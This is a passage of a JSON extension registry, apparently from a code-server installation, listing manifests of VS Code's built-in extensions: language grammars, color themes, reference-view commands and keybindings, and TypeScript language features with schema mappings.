== call-item"},{"command":"references-view.removeTypeItem","group":"1","when":"view == references-view.tree && viewItem == type-item"},{"command":"references-view.refind","group":"1","when":"view == references-view.tree && viewItem == history-item"},{"command":"references-view.copy","group":"2@1","when":"view == references-view.tree && viewItem == file-item || view == references-view.tree && viewItem == reference-item"},{"command":"references-view.copyPath","group":"2@2","when":"view == references-view.tree && viewItem == file-item"},{"command":"references-view.copyAll","group":"2@3","when":"view == references-view.tree && viewItem == file-item || view == references-view.tree && viewItem == reference-item"},{"command":"references-view.showOutgoingCalls","group":"1","when":"view == references-view.tree && viewItem == call-item"},{"command":"references-view.showIncomingCalls","group":"1","when":"view == references-view.tree && viewItem == call-item"},{"command":"references-view.showSupertypes","group":"1","when":"view == references-view.tree && viewItem == type-item"},{"command":"references-view.showSubtypes","group":"1","when":"view == references-view.tree && viewItem == type-item"}],"commandPalette":[{"command":"references-view.removeReferenceItem","when":"never"},{"command":"references-view.removeCallItem","when":"never"},{"command":"references-view.removeTypeItem","when":"never"},{"command":"references-view.copy","when":"never"},{"command":"references-view.copyAll","when":"never"},{"command":"references-view.copyPath","when":"never"},{"command":"references-view.refind","when":"never"},{"command":"references-view.findReferences","when":"editorHasReferenceProvider"},{"command":"references-view.clear","when":"reference-list.hasResult"},{"command":"references-view.clearHistory","when":"reference-list.isActive && !reference-list.hasResult"},{"command":"references-view.refresh","when":"reference-list.hasResult"},{"command":"references-view.pickFromHistory","when":"reference-list.isActive"},{"command":"references-view.next","when":"never"},{"command":"references-view.prev","when":"never"}]},"keybindings":[{"command":"references-view.findReferences","when":"editorHasReferenceProvider","key":"shift+alt+f12"},{"command":"references-view.next","when":"reference-list.hasResult","key":"f4"},{"command":"references-view.prev","when":"reference-list.hasResult","key":"shift+f4"},{"command":"references-view.showCallHierarchy","when":"editorHasCallHierarchyProvider","key":"shift+alt+h"}]}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/references-view","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.restructuredtext"},"manifest":{"name":"restructuredtext","displayName":"reStructuredText Language Basics","description":"Provides syntax highlighting in reStructuredText files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin trond-snekvik/vscode-rst syntaxes/rst.tmLanguage.json ./syntaxes/rst.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"restructuredtext","aliases":["reStructuredText"],"configuration":"./language-configuration.json","extensions":[".rst"]}],"grammars":[{"language":"restructuredtext","scopeName":"source.rst","path":"./syntaxes/rst.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/restructuredtext","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.ruby"},"manifest":{"name":"ruby","displayName":"Ruby Language Basics","description":"Provides syntax highlighting and bracket matching in Ruby files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin Shopify/ruby-lsp vscode/grammars/ruby.cson.json ./syntaxes/ruby.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"ruby","extensions":[".rb",".rbx",".rjs",".gemspec",".rake",".ru",".erb",".podspec",".rbi"],"filenames":["rakefile","gemfile","guardfile","podfile","capfile","cheffile","hobofile","vagrantfile","appraisals","rantfile","berksfile","berksfile.lock","thorfile","puppetfile","dangerfile","brewfile","fastfile","appfile","deliverfile","matchfile","scanfile","snapfile","gymfile"],"aliases":["Ruby","rb"],"firstLine":"^#!\\s*/.*\\bruby\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"ruby","scopeName":"source.ruby","path":"./syntaxes/ruby.tmLanguage.json"}],"configurationDefaults":{"[ruby]":{"editor.defaultColorDecorators":"never"}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ruby","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.rust"},"manifest":{"name":"rust","displayName":"Rust Language Basics","description":"Provides syntax highlighting and bracket matching in Rust files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammar.mjs"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"rust","extensions":[".rs"],"aliases":["Rust","rust"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"rust","path":"./syntaxes/rust.tmLanguage.json","scopeName":"source.rust"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/rust","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.scss"},"manifest":{"name":"scss","displayName":"SCSS Language Basics","description":"Provides syntax highlighting, bracket matching and folding in SCSS files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin atom/language-sass grammars/scss.cson ./syntaxes/scss.tmLanguage.json grammars/sassdoc.cson ./syntaxes/sassdoc.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"scss","aliases":["SCSS","scss"],"extensions":[".scss"],"mimetypes":["text/x-scss","text/scss"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"scss","scopeName":"source.css.scss","path":"./syntaxes/scss.tmLanguage.json"},{"scopeName":"source.sassdoc","path":"./syntaxes/sassdoc.tmLanguage.json"}],"problemMatchers":[{"name":"node-sass","label":"Node Sass Compiler","owner":"node-sass","fileLocation":"absolute","pattern":[{"regexp":"^{$"},{"regexp":"\\s*\"status\":\\s\\d+,"},{"regexp":"\\s*\"file\":\\s\"(.*)\",","file":1},{"regexp":"\\s*\"line\":\\s(\\d+),","line":1},{"regexp":"\\s*\"column\":\\s(\\d+),","column":1},{"regexp":"\\s*\"message\":\\s\"(.*)\",","message":1},{"regexp":"\\s*\"formatted\":\\s(.*)"},{"regexp":"^}$"}]}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/scss","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.search-result"},"manifest":{"name":"search-result","displayName":"Search Result","description":"Provides syntax highlighting and language features for tabbed search results.","version":"1.0.0","publisher":"vscode","license":"MIT","icon":"images/icon.png","engines":{"vscode":"^1.39.0"},"main":"./dist/extension.js","browser":"./dist/extension.js","activationEvents":["onLanguage:search-result"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"enabledApiProposals":["documentFiltersExclusive"],"contributes":{"configurationDefaults":{"[search-result]":{"editor.lineNumbers":"off"}},"languages":[{"id":"search-result","extensions":[".code-search"],"aliases":["Search Result"]}],"grammars":[{"language":"search-result","scopeName":"text.searchResult","path":"./syntaxes/searchResult.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/search-result","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.shaderlab"},"manifest":{"name":"shaderlab","displayName":"Shaderlab Language Basics","description":"Provides syntax highlighting and bracket matching in Shaderlab files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin tgjones/shaders-tmLanguage grammars/shaderlab.json ./syntaxes/shaderlab.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"shaderlab","extensions":[".shader"],"aliases":["ShaderLab","shaderlab"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"shaderlab","path":"./syntaxes/shaderlab.tmLanguage.json","scopeName":"source.shaderlab"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/shaderlab","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.shellscript"},"manifest":{"name":"shellscript","displayName":"Shell Script Language Basics","description":"Provides syntax highlighting and bracket matching in Shell Script files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin jeff-hykin/better-shell-syntax autogenerated/shell.tmLanguage.json ./syntaxes/shell-unix-bash.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"shellscript","aliases":["Shell Script","shellscript","bash","fish","sh","zsh","ksh","csh"],"extensions":[".sh",".bash",".bashrc",".bash_aliases",".bash_profile",".bash_login",".ebuild",".eclass",".profile",".bash_logout",".xprofile",".xsession",".xsessionrc",".Xsession",".zsh",".zshrc",".zprofile",".zlogin",".zlogout",".zshenv",".zsh-theme",".fish",".ksh",".csh",".cshrc",".tcshrc",".yashrc",".yash_profile"],"filenames":["APKBUILD","PKGBUILD",".envrc",".hushlogin","zshrc","zshenv","zlogin","zprofile","zlogout","bashrc_Apple_Terminal","zshrc_Apple_Terminal"],"firstLine":"^#!.*\\b(bash|fish|zsh|sh|ksh|dtksh|pdksh|mksh|ash|dash|yash|sh|csh|jcsh|tcsh|itcsh).*|^#\\s*-\\*-[^*]*mode:\\s*shell-script[^*]*-\\*-","configuration":"./language-configuration.json","mimetypes":["text/x-shellscript"]}],"grammars":[{"language":"shellscript","scopeName":"source.shell","path":"./syntaxes/shell-unix-bash.tmLanguage.json","balancedBracketScopes":["*"],"unbalancedBracketScopes":["meta.scope.case-pattern.shell"]}],"configurationDefaults":{"[shellscript]":{"files.eol":"\n","editor.defaultColorDecorators":"never"}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/shellscript","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.simple-browser"},"manifest":{"name":"simple-browser","displayName":"Simple Browser","description":"A very basic built-in webview for displaying web content.","enabledApiProposals":["externalUriOpener"],"version":"1.0.0","icon":"media/icon.png","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","engines":{"vscode":"^1.70.0"},"main":"./dist/extension","browser":"./dist/browser/extension","categories":["Other"],"extensionKind":["ui","workspace"],"activationEvents":["onCommand:simpleBrowser.api.open","onOpenExternalUri:http","onOpenExternalUri:https","onWebviewPanel:simpleBrowser.view"],"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"commands":[{"command":"simpleBrowser.show","title":"Show","category":"Simple Browser"}],"configuration":[{"title":"Simple Browser","properties":{"simpleBrowser.focusLockIndicator.enabled":{"type":"boolean","default":true,"title":"Focus Lock Indicator Enabled","description":"Enable/disable the floating indicator that shows when focused in the simple browser."}}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/simple-browser","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.sql"},"manifest":{"name":"sql","displayName":"SQL Language Basics","description":"Provides syntax highlighting and bracket matching in SQL files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammar.mjs"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"sql","extensions":[".sql",".dsql"],"aliases":["MS SQL","T-SQL"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"sql","scopeName":"source.sql","path":"./syntaxes/sql.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/sql","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.swift"},"manifest":{"name":"swift","displayName":"Swift Language Basics","description":"Provides snippets, syntax highlighting and bracket matching in Swift files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin jtbandes/swift-tmlanguage Swift.tmLanguage.json ./syntaxes/swift.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"swift","aliases":["Swift","swift"],"extensions":[".swift"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"swift","scopeName":"source.swift","path":"./syntaxes/swift.tmLanguage.json"}],"snippets":[{"language":"swift","path":"./snippets/swift.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/swift","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.terminal-suggest"},"manifest":{"name":"terminal-suggest","publisher":"vscode","displayName":"Terminal Suggest for VS Code","description":"Extension to add terminal completions for zsh, bash, and fish terminals.","version":"1.0.1","private":true,"license":"MIT","icon":"./src/media/icon.png","engines":{"vscode":"^1.95.0"},"categories":["Other"],"enabledApiProposals":["terminalCompletionProvider","terminalShellEnv"],"contributes":{"commands":[{"command":"terminal.integrated.suggest.clearCachedGlobals","category":"Terminal","title":"Clear Suggest Cached Globals"}],"terminal":{"completionProviders":[{"description":"Show suggestions for commands, arguments, flags, and file paths based upon the Fig spec."}]}},"main":"./dist/terminalSuggestMain","activationEvents":["onTerminalShellIntegration:*"],"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/terminal-suggest","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-abyss"},"manifest":{"name":"theme-abyss","displayName":"Abyss Theme","description":"Abyss theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Abyss","label":"Abyss","uiTheme":"vs-dark","path":"./themes/abyss-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-abyss","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-defaults"},"manifest":{"name":"theme-defaults","displayName":"Default Themes","description":"The default Visual Studio light and dark themes","categories":["Themes"],"version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"contributes":{"themes":[{"id":"Default Dark+","label":"Dark+","uiTheme":"vs-dark","path":"./themes/dark_plus.json"},{"id":"Default Dark Modern","label":"Dark Modern","uiTheme":"vs-dark","path":"./themes/dark_modern.json"},{"id":"Default Light+","label":"Light+","uiTheme":"vs","path":"./themes/light_plus.json"},{"id":"Default Light Modern","label":"Light Modern","uiTheme":"vs","path":"./themes/light_modern.json"},{"id":"Visual Studio Dark","label":"Dark (Visual Studio)","uiTheme":"vs-dark","path":"./themes/dark_vs.json"},{"id":"Visual Studio Light","label":"Light (Visual Studio)","uiTheme":"vs","path":"./themes/light_vs.json"},{"id":"Default High Contrast","label":"Dark High Contrast","uiTheme":"hc-black","path":"./themes/hc_black.json"},{"id":"Default High Contrast Light","label":"Light High Contrast","uiTheme":"hc-light","path":"./themes/hc_light.json"}],"iconThemes":[{"id":"vs-minimal","label":"Minimal (Visual Studio Code)","path":"./fileicons/vs_minimal-icon-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-defaults","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-kimbie-dark"},"manifest":{"name":"theme-kimbie-dark","displayName":"Kimbie Dark Theme","description":"Kimbie dark theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Kimbie Dark","label":"Kimbie Dark","uiTheme":"vs-dark","path":"./themes/kimbie-dark-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-kimbie-dark","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-monokai"},"manifest":{"name":"theme-monokai","displayName":"Monokai Theme","description":"Monokai theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Monokai","label":"Monokai","uiTheme":"vs-dark","path":"./themes/monokai-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-monokai","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-monokai-dimmed"},"manifest":{"name":"theme-monokai-dimmed","displayName":"Monokai Dimmed Theme","description":"Monokai dimmed theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Monokai Dimmed","label":"Monokai Dimmed","uiTheme":"vs-dark","path":"./themes/dimmed-monokai-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-monokai-dimmed","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-quietlight"},"manifest":{"name":"theme-quietlight","displayName":"Quiet Light Theme","description":"Quiet light theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Quiet Light","label":"Quiet Light","uiTheme":"vs","path":"./themes/quietlight-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-quietlight","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-red"},"manifest":{"name":"theme-red","displayName":"Red Theme","description":"Red theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Red","label":"Red","uiTheme":"vs-dark","path":"./themes/Red-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-red","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.vscode-theme-seti"},"manifest":{"name":"vscode-theme-seti","private":true,"version":"1.0.0","displayName":"Seti File Icon Theme","description":"A file icon theme made out of the Seti UI file icons","publisher":"vscode","license":"MIT","icon":"icons/seti-circular-128x128.png","scripts":{"update":"node ./build/update-icon-theme.js"},"engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"iconThemes":[{"id":"vs-seti","label":"Seti (Visual Studio Code)","path":"./icons/vs-seti-icon-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-seti","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-solarized-dark"},"manifest":{"name":"theme-solarized-dark","displayName":"Solarized Dark Theme","description":"Solarized dark theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Solarized Dark","label":"Solarized Dark","uiTheme":"vs-dark","path":"./themes/solarized-dark-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-solarized-dark","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-solarized-light"},"manifest":{"name":"theme-solarized-light","displayName":"Solarized Light Theme","description":"Solarized light theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Solarized Light","label":"Solarized Light","uiTheme":"vs","path":"./themes/solarized-light-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-solarized-light","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.theme-tomorrow-night-blue"},"manifest":{"name":"theme-tomorrow-night-blue","displayName":"Tomorrow Night Blue Theme","description":"Tomorrow night blue theme for Visual Studio Code","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Themes"],"contributes":{"themes":[{"id":"Tomorrow Night Blue","label":"Tomorrow Night Blue","uiTheme":"vs-dark","path":"./themes/tomorrow-night-blue-color-theme.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/theme-tomorrow-night-blue","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.tunnel-forwarding"},"manifest":{"name":"tunnel-forwarding","displayName":"Local Tunnel Port Forwarding","description":"Allows forwarding local ports to be accessible over the internet.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.82.0"},"icon":"media/icon.png","capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"enabledApiProposals":["resolvers","tunnelFactory"],"activationEvents":["onTunnel"],"contributes":{"commands":[{"category":"Port Forwarding","command":"tunnel-forwarding.showLog","title":"Show Log","enablement":"tunnelForwardingHasLog"},{"category":"Port Forwarding","command":"tunnel-forwarding.restart","title":"Restart Forwarding System","enablement":"tunnelForwardingIsRunning"}]},"main":"./dist/extension","prettier":{"printWidth":100,"trailingComma":"all","singleQuote":true,"arrowParens":"avoid"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/tunnel-forwarding","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.typescript"},"manifest":{"name":"typescript","description":"Provides snippets, syntax highlighting, bracket matching and folding in TypeScript files.","displayName":"TypeScript Language Basics","version":"1.0.0","author":"vscode","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammars.mjs"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"typescript","aliases":["TypeScript","ts","typescript"],"extensions":[".ts",".cts",".mts"],"configuration":"./language-configuration.json"},{"id":"typescriptreact","aliases":["TypeScript JSX","TypeScript React","tsx"],"extensions":[".tsx"],"configuration":"./language-configuration.json"},{"id":"jsonc","filenames":["tsconfig.json","jsconfig.json"],"filenamePatterns":["tsconfig.*.json","jsconfig.*.json","tsconfig-*.json","jsconfig-*.json"]},{"id":"json","extensions":[".tsbuildinfo"]}],"grammars":[{"language":"typescript","scopeName":"source.ts","path":"./syntaxes/TypeScript.tmLanguage.json","unbalancedBracketScopes":["keyword.operator.relational","storage.type.function.arrow","keyword.operator.bitwise.shift","meta.brace.angle","punctuation.definition.tag","keyword.operator.assignment.compound.bitwise.ts"],"tokenTypes":{"punctuation.definition.template-expression":"other","entity.name.type.instance.jsdoc":"other","entity.name.function.tagged-template":"other","meta.import string.quoted":"other","variable.other.jsdoc":"other"}},{"language":"typescriptreact","scopeName":"source.tsx","path":"./syntaxes/TypeScriptReact.tmLanguage.json","unbalancedBracketScopes":["keyword.operator.relational","storage.type.function.arrow","keyword.operator.bitwise.shift","punctuation.definition.tag","keyword.operator.assignment.compound.bitwise.ts"],"embeddedLanguages":{"meta.tag.tsx":"jsx-tags","meta.tag.without-attributes.tsx":"jsx-tags","meta.tag.attributes.tsx":"typescriptreact","meta.embedded.expression.tsx":"typescriptreact"},"tokenTypes":{"punctuation.definition.template-expression":"other","entity.name.type.instance.jsdoc":"other","entity.name.function.tagged-template":"other","meta.import string.quoted":"other","variable.other.jsdoc":"other"}},{"scopeName":"documentation.injection.ts","path":"./syntaxes/jsdoc.ts.injection.tmLanguage.json","injectTo":["source.ts","source.tsx"]},{"scopeName":"documentation.injection.js.jsx","path":"./syntaxes/jsdoc.js.injection.tmLanguage.json","injectTo":["source.js","source.js.jsx"]}],"semanticTokenScopes":[{"language":"typescript","scopes":{"property":["variable.other.property.ts"],"property.readonly":["variable.other.constant.property.ts"],"variable":["variable.other.readwrite.ts"],"variable.readonly":["variable.other.constant.object.ts"],"function":["entity.name.function.ts"],"namespace":["entity.name.type.module.ts"],"variable.defaultLibrary":["support.variable.ts"],"function.defaultLibrary":["support.function.ts"]}},{"language":"typescriptreact","scopes":{"property":["variable.other.property.tsx"],"property.readonly":["variable.other.constant.property.tsx"],"variable":["variable.other.readwrite.tsx"],"variable.readonly":["variable.other.constant.object.tsx"],"function":["entity.name.function.tsx"],"namespace":["entity.name.type.module.tsx"],"variable.defaultLibrary":["support.variable.tsx"],"function.defaultLibrary":["support.function.tsx"]}}],"snippets":[{"language":"typescript","path":"./snippets/typescript.code-snippets"},{"language":"typescriptreact","path":"./snippets/typescript.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/typescript-basics","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.typescript-language-features"},"manifest":{"name":"typescript-language-features","description":"Provides rich language support for JavaScript and TypeScript.","displayName":"TypeScript and JavaScript Language Features","version":"1.0.0","author":"vscode","publisher":"vscode","license":"MIT","aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","enabledApiProposals":["workspaceTrust","multiDocumentHighlightProvider","codeActionAI","codeActionRanges","editorHoverVerbosityLevel"],"capabilities":{"virtualWorkspaces":{"supported":"limited","description":"In virtual workspaces, resolving and finding references across files is not supported."},"untrustedWorkspaces":{"supported":"limited","description":"The extension requires workspace trust when the workspace version is used because it executes code specified by the workspace.","restrictedConfigurations":["typescript.tsdk","typescript.tsserver.pluginPaths","typescript.npm","typescript.tsserver.nodePath"]}},"engines":{"vscode":"^1.30.0"},"icon":"media/icon.png","categories":["Programming Languages"],"activationEvents":["onLanguage:javascript","onLanguage:javascriptreact","onLanguage:typescript","onLanguage:typescriptreact","onLanguage:jsx-tags","onCommand:typescript.tsserverRequest","onCommand:_typescript.configurePlugin","onCommand:_typescript.learnMoreAboutRefactorings","onCommand:typescript.fileReferences","onTaskType:typescript","onLanguage:jsonc","onWalkthrough:nodejsWelcome"],"main":"./dist/extension","browser":"./dist/browser/extension","contributes":{"jsonValidation":[{"fileMatch":"package.json","url":"./schemas/package.schema.json"},{"fileMatch":"tsconfig.json","url":"https://www.schemastore.org/tsconfig"},{"fileMatch":"tsconfig.json","url":"./schemas/tsconfig.schema.json"},{"fileMatch":"tsconfig.*.json","url":"https://www.schemastore.org/tsconfig"},{"fileMatch":"tsconfig-*.json","url":"./schemas/tsconfig.schema.json"},{"fileMatch":"tsconfig-*.json","url":"https://www.schemastore.org/tsconfig"},{"fileMatch":"tsconfig.*.json","url":"./schemas/tsconfig.schema.json"},{"fileMatch":"typings.json","url":"https://www.schemastore.org/typings"},{"fileMatch":".bowerrc","url":"https://www.schemastore.org/bowerrc"},{"fileMatch":".babelrc","url":"https://www.schemastore.org/babelrc"},{"fileMatch":".babelrc.json","url":"https://www.schemastore.org/babelrc"},{"fileMatch":"babel.config.json","url":"https://www.schemastore.org/babelrc"},{"fileMatch":"jsconfig.json","url":"https://www.schemastore.org/jsconfig"},{"fileMatch":"jsconfig.json","url":"./schemas/jsconfig.schema.json"},{"fileMatch":"jsconfig.*.json","url":"https://www.schemastore.org/jsconfig"},{"fileMatch":"jsconfig.*.json","url":"./schemas/jsconfig.schema.json"},{"fileMatch":".swcrc","url":"https://swc.rs/schema.json"},{"fileMatch":"typedoc.json","url":"https://typedoc